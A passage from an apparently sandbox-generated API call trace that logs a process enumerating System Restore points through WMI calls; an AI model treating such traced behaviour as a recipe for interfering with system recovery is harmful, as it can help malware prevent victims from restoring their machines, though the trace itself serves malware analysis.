pToken=0x41e990) returned 0x0 [0113.049] WbemLocator:IUnknown:QueryInterface (in: This=0x780ed4, riid=0x41ea60*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x41ea5c | out: ppvObject=0x41ea5c*=0x6736ac4) returned 0x0 [0113.049] IUnknown:AddRef (This=0x6736ac4) returned 0x4 [0113.050] IUnknown:Release (This=0x6736ac4) returned 0x3 [0113.050] IUnknown:Release (This=0x6736ac4) returned 0x2 [0113.050] IUnknown:Release (This=0x67369fc) returned 0x2 [0113.050] SysStringLen (param_1=0x0) returned 0x0 [0113.050] IEnumWbemClassObject:Reset (This=0x6736ac4) returned 0x0 [0113.052] CoTaskMemAlloc (cb=0x4) returned 0x77db48 [0113.052] IEnumWbemClassObject:Next (in: This=0x6736ac4, lTimeout=-1, uCount=0x1, apObjects=0x77db48, puReturned=0x3526b58 | out: apObjects=0x77db48*=0x6736b00, puReturned=0x3526b58*=0x1) returned 0x0 [0116.552] IUnknown:QueryInterface (in: This=0x6736b00, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e2e0 | out: ppvObject=0x41e2e0*=0x6736b00) returned 0x0 [0116.552] IUnknown:QueryInterface (in: This=0x6736b00, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e29c | out: ppvObject=0x41e29c*=0x0) returned 0x80004002 [0116.552] IUnknown:QueryInterface (in: This=0x6736b00, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e0bc | out: ppvObject=0x41e0bc*=0x0) returned 0x80004002 [0116.552] IUnknown:AddRef (This=0x6736b00) returned 0x3 [0116.552] IUnknown:QueryInterface (in: This=0x6736b00, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dbfc | out: ppvObject=0x41dbfc*=0x0) returned 0x80004002 [0116.553] IUnknown:QueryInterface (in: This=0x6736b00, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dbac | out: ppvObject=0x41dbac*=0x0) returned 0x80004002 [0116.553] IUnknown:QueryInterface (in: This=0x6736b00, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dbb8 | out: ppvObject=0x41dbb8*=0x6736b04) returned 0x0 [0116.553] IMarshal:GetUnmarshalClass (in: This=0x6736b04, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dbc0 | out: pCid=0x41dbc0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0116.553] IUnknown:Release (This=0x6736b04) returned 0x3 [0116.553] CoGetContextToken (in: pToken=0x41dc18 | out: pToken=0x41dc18) returned 0x0 [0116.553] CoGetContextToken (in: pToken=0x41e020 | out: pToken=0x41e020) returned 0x0 [0116.553] IUnknown:QueryInterface (in: This=0x6736b00, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e0b0 | out: ppvObject=0x41e0b0*=0x0) returned 0x80004002 [0116.553] IUnknown:Release (This=0x6736b00) returned 0x2 [0116.553] CoGetContextToken (in: pToken=0x41e5f0 | out: pToken=0x41e5f0) returned 0x0 [0116.553] CoGetContextToken (in: pToken=0x41e550 | out: pToken=0x41e550) returned 0x0 [0116.553] IUnknown:QueryInterface (in: This=0x6736b00, riid=0x41e620*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x41e61c | out: ppvObject=0x41e61c*=0x6736b00) returned 0x0 [0116.553] IUnknown:AddRef (This=0x6736b00) returned 0x4 [0116.553] IUnknown:Release (This=0x6736b00) returned 0x3 [0116.553] IUnknown:Release (This=0x6736b00) returned 0x2 [0116.553] CoTaskMemFree (pv=0x77db48) [0116.553] CoGetContextToken (in: pToken=0x41e958 | out: pToken=0x41e958) returned 0x0 [0116.553] IUnknown:AddRef (This=0x6736b00) returned 0x3 [0116.554] IWbemClassObject:Get (in: This=0x6736b00, wszName="__GENUS", lFlags=0, pVal=0x41ec6c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecec*=0, plFlavor=0x41ece8*=0 | out: pVal=0x41ec6c*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x41ecec*=3, plFlavor=0x41ece8*=64) returned 0x0 [0116.554] IWbemClassObject:Get (in: This=0x6736b00, wszName="__PATH", lFlags=0, pVal=0x41ec50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecd4*=0, plFlavor=0x41ecd0*=0 | out: pVal=0x41ec50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=3", varVal2=0x0), pType=0x41ecd4*=8, plFlavor=0x41ecd0*=64) returned 0x0 [0116.554] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=3") returned 0x6e [0116.554] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=3") returned 0x6e [0116.554] CoGetObjectContext (in: riid=0x346e308*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41ec7c | out: ppv=0x41ec7c*=0x72015c) returned 0x0 [0116.554] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x41ec74 | out: pAptType=0x41ec74*=1) returned 0x0 [0116.554] IUnknown:QueryInterface (in: This=0x72015c, riid=0x346e2f0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x41ec78 | out: ppvObject=0x41ec78*=0x0) returned 0x80004002 [0116.554] IUnknown:Release (This=0x72015c) returned 0x1 [0116.555] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e5e8 | out: ppv=0x41e5e8*=0x67366b8) returned 0x0 [0116.555] WbemDefPath:IUnknown:QueryInterface (in: This=0x67366b8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e800 | out: ppvObject=0x41e800*=0x0) returned 0x80004002 [0116.555] WbemDefPath:IClassFactory:CreateInstance (in: This=0x67366b8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e814 | out: ppvObject=0x41e814*=0x6736c98) returned 0x0 [0116.555] WbemDefPath:IUnknown:Release (This=0x67366b8) returned 0x0 [0116.555] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736c98, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e434 | out: ppvObject=0x41e434*=0x6736c98) returned 0x0 [0116.556] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736c98, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e3f0 | out: ppvObject=0x41e3f0*=0x0) returned 0x80004002 [0116.556] WbemDefPath:IUnknown:AddRef (This=0x6736c98) returned 0x3 [0116.556] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736c98, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dd4c | out: ppvObject=0x41dd4c*=0x0) returned 0x80004002 [0116.556] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736c98, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dcfc | out: ppvObject=0x41dcfc*=0x0) returned 0x80004002 [0116.556] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736c98, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dd08 | out: ppvObject=0x41dd08*=0x77db48) returned 0x0 [0116.556] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77db48, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dd10 | out: pCid=0x41dd10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0116.556] WbemDefPath:IUnknown:Release (This=0x77db48) returned 0x3 [0116.556] CoGetContextToken (in: pToken=0x41dd68 | out: pToken=0x41dd68) returned 0x0 [0116.556] CoGetContextToken (in: pToken=0x41e170 | out: pToken=0x41e170) returned 0x0 [0116.556] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736c98, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e200 | out: ppvObject=0x41e200*=0x0) returned 0x80004002 [0116.556] WbemDefPath:IUnknown:Release (This=0x6736c98) returned 0x2 [0116.556] WbemDefPath:IUnknown:Release (This=0x6736c98) returned 0x1 [0116.556] CoGetContextToken (in: pToken=0x41eaf8 | out: pToken=0x41eaf8) returned 0x0 [0116.556] CoGetContextToken (in: pToken=0x41ea58 | out: pToken=0x41ea58) returned 0x0 [0116.557] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736c98, riid=0x41eb28*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x41eb24 | out: ppvObject=0x41eb24*=0x6736c98) returned 0x0 [0116.557] WbemDefPath:IUnknown:AddRef (This=0x6736c98) returned 0x3 [0116.557] WbemDefPath:IUnknown:Release (This=0x6736c98) returned 0x2 [0116.557] WbemDefPath:IWbemPath:SetText (This=0x6736c98, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=3") returned 0x0 [0116.557] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41eca8 | out: puCount=0x41eca8*=0x2) returned 0x0 [0116.557] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x0, pszText=0x0 | out: puBuffLength=0x41eca4*=0x11, pszText=0x0) returned 0x0 [0116.557] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41eca4*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.557] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41ec74 | out: puCount=0x41ec74*=0x2) returned 0x0 [0116.557] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x0, pszText=0x0 | out: puBuffLength=0x41ec70*=0x11, pszText=0x0) returned 0x0 [0116.557] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41ec70*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.558] IWbemClassObject:Get (in: This=0x6736b00, wszName="sequencenumber", lFlags=0, pVal=0x41ec70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3527374*=0, plFlavor=0x3527378*=0 | out: pVal=0x41ec70*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), pType=0x3527374*=19, plFlavor=0x3527378*=0) returned 0x0 [0116.558] IWbemClassObject:Get (in: This=0x6736b00, wszName="sequencenumber", lFlags=0, pVal=0x41ec78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3527374*=19, plFlavor=0x3527378*=0 | out: pVal=0x41ec78*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), pType=0x3527374*=19, plFlavor=0x3527378*=0) returned 0x0 [0116.559] CoTaskMemAlloc (cb=0x4) returned 0x77db88 [0116.559] IEnumWbemClassObject:Next (in: This=0x6736ac4, lTimeout=-1, uCount=0x1, apObjects=0x77db88, puReturned=0x3526b58 | out: apObjects=0x77db88*=0x6732be0, puReturned=0x3526b58*=0x1) returned 0x0 [0116.578] IUnknown:QueryInterface (in: This=0x6732be0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e2e0 | out: ppvObject=0x41e2e0*=0x6732be0) returned 0x0 [0116.578] IUnknown:QueryInterface (in: This=0x6732be0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e29c | out: ppvObject=0x41e29c*=0x0) returned 0x80004002 [0116.578] IUnknown:QueryInterface (in: This=0x6732be0, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e0bc | out: ppvObject=0x41e0bc*=0x0) returned 0x80004002 [0116.578] IUnknown:AddRef (This=0x6732be0) returned 0x3 [0116.578] IUnknown:QueryInterface (in: This=0x6732be0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dbfc | out: ppvObject=0x41dbfc*=0x0) returned 0x80004002 [0116.578] IUnknown:QueryInterface (in: This=0x6732be0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dbac | out: ppvObject=0x41dbac*=0x0) returned 0x80004002 [0116.578] IUnknown:QueryInterface (in: This=0x6732be0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dbb8 | out: ppvObject=0x41dbb8*=0x6732be4) returned 0x0 [0116.579] IMarshal:GetUnmarshalClass (in: This=0x6732be4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dbc0 | out: pCid=0x41dbc0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0116.579] IUnknown:Release (This=0x6732be4) returned 0x3 [0116.579] CoGetContextToken (in: pToken=0x41dc18 | out: pToken=0x41dc18) returned 0x0 [0116.579] CoGetContextToken (in: pToken=0x41e020 | out: pToken=0x41e020) returned 0x0 [0116.579] IUnknown:QueryInterface (in: This=0x6732be0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e0b0 | out: ppvObject=0x41e0b0*=0x0) returned 0x80004002 [0116.579] IUnknown:Release (This=0x6732be0) returned 0x2 [0116.579] CoGetContextToken (in: pToken=0x41e5f0 | out: pToken=0x41e5f0) returned 0x0 [0116.579] CoGetContextToken (in: pToken=0x41e550 | out: pToken=0x41e550) returned 0x0 [0116.579] IUnknown:QueryInterface (in: This=0x6732be0, riid=0x41e620*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x41e61c | out: ppvObject=0x41e61c*=0x6732be0) returned 0x0 [0116.579] IUnknown:AddRef (This=0x6732be0) returned 0x4 [0116.579] IUnknown:Release (This=0x6732be0) returned 0x3 [0116.579] IUnknown:Release (This=0x6732be0) returned 0x2 [0116.579] CoTaskMemFree (pv=0x77db88) [0116.579] CoGetContextToken (in: pToken=0x41e958 | out: pToken=0x41e958) returned 0x0 [0116.579] IUnknown:AddRef (This=0x6732be0) returned 0x3 [0116.579] IWbemClassObject:Get (in: This=0x6732be0, wszName="__GENUS", lFlags=0, pVal=0x41ec6c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecec*=0, plFlavor=0x41ece8*=0 | out: pVal=0x41ec6c*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x41ecec*=3, plFlavor=0x41ece8*=64) returned 0x0 [0116.580] IWbemClassObject:Get (in: This=0x6732be0, wszName="__PATH", lFlags=0, pVal=0x41ec50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecd4*=0, plFlavor=0x41ecd0*=0 | out: pVal=0x41ec50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=4", varVal2=0x0), pType=0x41ecd4*=8, plFlavor=0x41ecd0*=64) returned 0x0 [0116.580] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=4") returned 0x6e [0116.580] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=4") returned 0x6e [0116.580] CoGetObjectContext (in: riid=0x346e308*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41ec7c | out: ppv=0x41ec7c*=0x72015c) returned 0x0 [0116.580] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x41ec74 | out: pAptType=0x41ec74*=1) returned 0x0 [0116.580] IUnknown:QueryInterface (in: This=0x72015c, riid=0x346e2f0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x41ec78 | out: ppvObject=0x41ec78*=0x0) returned 0x80004002 [0116.580] IUnknown:Release (This=0x72015c) returned 0x1 [0116.586] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e5e8 | out: ppv=0x41e5e8*=0x672cce0) returned 0x0 [0116.586] WbemDefPath:IUnknown:QueryInterface (in: This=0x672cce0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e800 | out: ppvObject=0x41e800*=0x0) returned 0x80004002 [0116.587] WbemDefPath:IClassFactory:CreateInstance (in: This=0x672cce0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e814 | out: ppvObject=0x41e814*=0x6732e38) returned 0x0 [0116.587] WbemDefPath:IUnknown:Release (This=0x672cce0) returned 0x0 [0116.587] WbemDefPath:IUnknown:QueryInterface (in: This=0x6732e38, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e434 | out: ppvObject=0x41e434*=0x6732e38) returned 0x0 [0116.587] WbemDefPath:IUnknown:QueryInterface (in: This=0x6732e38, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e3f0 | out: ppvObject=0x41e3f0*=0x0) returned 0x80004002 [0116.587] WbemDefPath:IUnknown:AddRef (This=0x6732e38) returned 0x3 [0116.587] WbemDefPath:IUnknown:QueryInterface (in: This=0x6732e38, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dd4c | out: ppvObject=0x41dd4c*=0x0) returned 0x80004002 [0116.587] WbemDefPath:IUnknown:QueryInterface (in: This=0x6732e38, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dcfc | out: ppvObject=0x41dcfc*=0x0) returned 0x80004002 [0116.587] WbemDefPath:IUnknown:QueryInterface (in: This=0x6732e38, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dd08 | out: ppvObject=0x41dd08*=0x77db88) returned 0x0 [0116.587] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77db88, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dd10 | out: pCid=0x41dd10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0116.587] WbemDefPath:IUnknown:Release (This=0x77db88) returned 0x3 [0116.587] CoGetContextToken (in: pToken=0x41dd68 | out: pToken=0x41dd68) returned 0x0 [0116.587] CoGetContextToken (in: pToken=0x41e170 | out: pToken=0x41e170) returned 0x0 [0116.587] WbemDefPath:IUnknown:QueryInterface (in: This=0x6732e38, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e200 | out: ppvObject=0x41e200*=0x0) returned 0x80004002 [0116.588] WbemDefPath:IUnknown:Release (This=0x6732e38) returned 0x2 [0116.588] WbemDefPath:IUnknown:Release (This=0x6732e38) returned 0x1 [0116.588] CoGetContextToken (in: pToken=0x41eaf8 | out: pToken=0x41eaf8) returned 0x0 [0116.588] CoGetContextToken (in: pToken=0x41ea58 | out: pToken=0x41ea58) returned 0x0 [0116.588] WbemDefPath:IUnknown:QueryInterface (in: This=0x6732e38, riid=0x41eb28*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x41eb24 | out: ppvObject=0x41eb24*=0x6732e38) returned 0x0 [0116.588] WbemDefPath:IUnknown:AddRef (This=0x6732e38) returned 0x3 [0116.588] WbemDefPath:IUnknown:Release (This=0x6732e38) returned 0x2 [0116.588] WbemDefPath:IWbemPath:SetText (This=0x6732e38, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=4") returned 0x0 [0116.588] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41eca8 | out: puCount=0x41eca8*=0x2) returned 0x0 [0116.588] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x0, pszText=0x0 | out: puBuffLength=0x41eca4*=0x11, pszText=0x0) returned 0x0 [0116.588] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41eca4*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.589] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41ec74 | out: puCount=0x41ec74*=0x2) returned 0x0 [0116.589] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x0, pszText=0x0 | 